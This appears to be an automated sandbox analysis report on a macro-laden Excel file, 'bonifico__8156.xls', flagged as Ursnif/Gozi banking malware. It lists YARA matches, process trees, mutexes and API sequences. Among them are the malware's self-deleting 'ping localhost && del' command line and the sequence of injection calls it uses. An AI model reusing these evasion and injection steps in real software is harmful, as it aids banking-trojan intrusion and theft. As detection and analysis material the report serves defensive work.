Source: C:\Windows\System32\control.exe	Code function: 19_2_003E5C90	19_2_003E5C90
Source: C:\Windows\System32\control.exe	Code function: 19_2_003CECFC	19_2_003CECFC
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D5D34	19_2_003D5D34
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E4918	19_2_003E4918
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E0904	19_2_003E0904
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C25BC	19_2_003C25BC
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C8598	19_2_003C8598
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D5A4C	19_2_003D5A4C
Source: C:\Windows\System32\control.exe	Code function: 19_2_003CCAA4	19_2_003CCAA4
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D52A4	19_2_003D52A4
Source: C:\Windows\System32\control.exe	Code function: 19_2_003DFA9C	19_2_003DFA9C
Source: C:\Windows\System32\control.exe	Code function: 19_2_003DEE94	19_2_003DEE94
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D2EF8	19_2_003D2EF8
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C4B30	19_2_003C4B30
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C9774	19_2_003C9774
Source: C:\Windows\System32\control.exe	Code function: 19_2_003E8F74	19_2_003E8F74
Source: C:\Windows\System32\control.exe	Code function: 19_2_003DDBB4	19_2_003DDBB4
Source: C:\Windows\System32\control.exe	Code function: 19_2_003DC380	19_2_003DC380
Source: C:\Windows\System32\control.exe	Code function: 19_2_003D7BE4	19_2_003D7BE4
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C1BD8	19_2_003C1BD8
Source: C:\Windows\System32\control.exe	Code function: 19_2_003C3BD4	19_2_003C3BD4
Source: C:\Windows\explorer.exe	Code function: 20_2_05386338	20_2_05386338
Source: C:\Windows\explorer.exe	Code function: 20_2_0537DBB4	20_2_0537DBB4
Source: C:\Windows\explorer.exe	Code function: 20_2_05377BE4	20_2_05377BE4
Source: C:\Windows\explorer.exe	Code function: 20_2_05361BD8	20_2_05361BD8
Source: C:\Windows\explorer.exe	Code function: 20_2_05375D34	20_2_05375D34
Source: C:\Windows\explorer.exe	Code function: 20_2_05384918	20_2_05384918
Source: C:\Windows\explorer.exe	Code function: 20_2_05380904	20_2_05380904
Source: C:\Windows\explorer.exe	Code function: 20_2_053625BC	20_2_053625BC
Source: C:\Windows\explorer.exe	Code function: 20_2_05368598	20_2_05368598
Source: C:\Windows\explorer.exe	Code function: 20_2_0537A43C	20_2_0537A43C
Source: C:\Windows\explorer.exe	Code function: 20_2_0537D03C	20_2_0537D03C
Source: C:\Windows\explorer.exe	Code function: 20_2_05384014	20_2_05384014
Source: C:\Windows\explorer.exe	Code function: 20_2_05374800	20_2_05374800
Source: C:\Windows\explorer.exe	Code function: 20_2_0536F40C	20_2_0536F40C
Source: C:\Windows\explorer.exe	Code function: 20_2_05373C7C	20_2_05373C7C
Source: C:\Windows\explorer.exe	Code function: 20_2_0537C078	20_2_0537C078
Source: C:\Windows\explorer.exe	Code function: 20_2_05388854	20_2_05388854
Source: C:\Windows\explorer.exe	Code function: 20_2_05385C90	20_2_05385C90
Source: C:\Windows\explorer.exe	Code function: 20_2_0536ECFC	20_2_0536ECFC
Source: C:\Windows\explorer.exe	Code function: 20_2_05364B30	20_2_05364B30
Source: C:\Windows\explorer.exe	Code function: 20_2_05369774	20_2_05369774
Source: C:\Windows\explorer.exe	Code function: 20_2_05388F74	20_2_05388F74
Source: C:\Windows\explorer.exe	Code function: 20_2_0537C380	20_2_0537C380
Source: C:\Windows\explorer.exe	Code function: 20_2_05363BD4	20_2_05363BD4
Source: C:\Windows\explorer.exe	Code function: 20_2_0536BA44	20_2_0536BA44
Source: C:\Windows\explorer.exe	Code function: 20_2_05375A4C	20_2_05375A4C
Source: C:\Windows\explorer.exe	Code function: 20_2_0536CAA4	20_2_0536CAA4
Source: C:\Windows\explorer.exe	Code function: 20_2_053752A4	20_2_053752A4
Source: C:\Windows\explorer.exe	Code function: 20_2_0537EE94	20_2_0537EE94
Source: C:\Windows\explorer.exe	Code function: 20_2_0537FA9C	20_2_0537FA9C
Source: C:\Windows\explorer.exe	Code function: 20_2_05372EF8	20_2_05372EF8
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E7BA44	25_2_0000020620E7BA44
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E77700	25_2_0000020620E77700
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E725BC	25_2_0000020620E725BC
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E78598	25_2_0000020620E78598
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E74B30	25_2_0000020620E74B30
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E96338	25_2_0000020620E96338
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E82EF8	25_2_0000020620E82EF8
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E8EE94	25_2_0000020620E8EE94
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E7CAA4	25_2_0000020620E7CAA4
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E852A4	25_2_0000020620E852A4
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E8FA9C	25_2_0000020620E8FA9C
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E85A4C	25_2_0000020620E85A4C
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E8A43C	25_2_0000020620E8A43C
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E8D03C	25_2_0000020620E8D03C
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E94014	25_2_0000020620E94014
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E7F40C	25_2_0000020620E7F40C
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E84800	25_2_0000020620E84800
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E73BD4	25_2_0000020620E73BD4
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E71BD8	25_2_0000020620E71BD8
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E87BE4	25_2_0000020620E87BE4
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E8DBB4	25_2_0000020620E8DBB4
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E98F74	25_2_0000020620E98F74
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E79774	25_2_0000020620E79774
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E8C380	25_2_0000020620E8C380
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E85D34	25_2_0000020620E85D34
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E94918	25_2_0000020620E94918
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E90904	25_2_0000020620E90904
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E7ECFC	25_2_0000020620E7ECFC
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E95C90	25_2_0000020620E95C90
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E8C078	25_2_0000020620E8C078
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E83C7C	25_2_0000020620E83C7C
Source: C:\Windows\System32\rundll32.exe	Code function: 25_2_0000020620E98854	25_2_0000020620E98854

Source: bonifico__8156.xls

OLE indicator, VBA macros: true

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Section loaded: onecoreuapcommonproxystub.dll

Jump to behavior

Source: 00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.926087317.00000000009E1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.928248416.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.840741747.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.853379113.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.922958864.0000000001AF8000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: explorer.exe PID: 3760, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: RuntimeBroker.exe PID: 3208, type: MEMORY	Matched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.phis.bank.troj.spyw.expl.evad.winXLS@27/63@10/3

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Code function: 5_2_001C6641 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

5_2_001C6641

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{FD19E902-3813-373D-2A81-EC5BFE45E0BF}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{211CC393-0C87-FB96-1EE5-005F32E93403}
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Mutant created: \Sessions\1\BaseNamedObjects\{FD674D9B-3809-37BB-2A81-EC5BFE45E0BF}

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{ACAEEF30-D19C-4803-A701-870B22E8CB5E} - OProcSessId.dat

Jump to behavior

Source: bonifico__8156.xls

OLE indicator, Workbook stream: true

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Command line argument: `)A

5_2_004128B0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?

Source: bonifico__8156.xls

Virustotal: Detection: 21%

Source: CVPFktt.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\sxibiNa\ZpsvnMb\CVPFktt.exe 'C:\sxibiNa\ZpsvnMb\CVPFktt.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2244 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1760 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5692 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1192 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1736 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\sxibiNa\ZpsvnMb\CVPFktt.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\sxibiNa\ZpsvnMb\CVPFktt.exe 'C:\sxibiNa\ZpsvnMb\CVPFktt.exe'	Jump to behavior
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2244 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1760 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5692 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1192 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1736 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\sxibiNa\ZpsvnMb\CVPFktt.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000014.00000000.910759401.0000000005230000.00000002.00000001.sdmp
Source:	Binary string: ime\crypt\tmp_1452187773\bin\hoxita.pdb source: CVPFktt.exe
Source:	Binary string: ntdll.pdb source: CVPFktt.exe, 00000005.00000003.866377474.0000000003E70000.00000004.00000001.sdmp
Source:	Binary string: C:\pivowutikaperoso\xaxe.pdb source: CVPFktt.exe
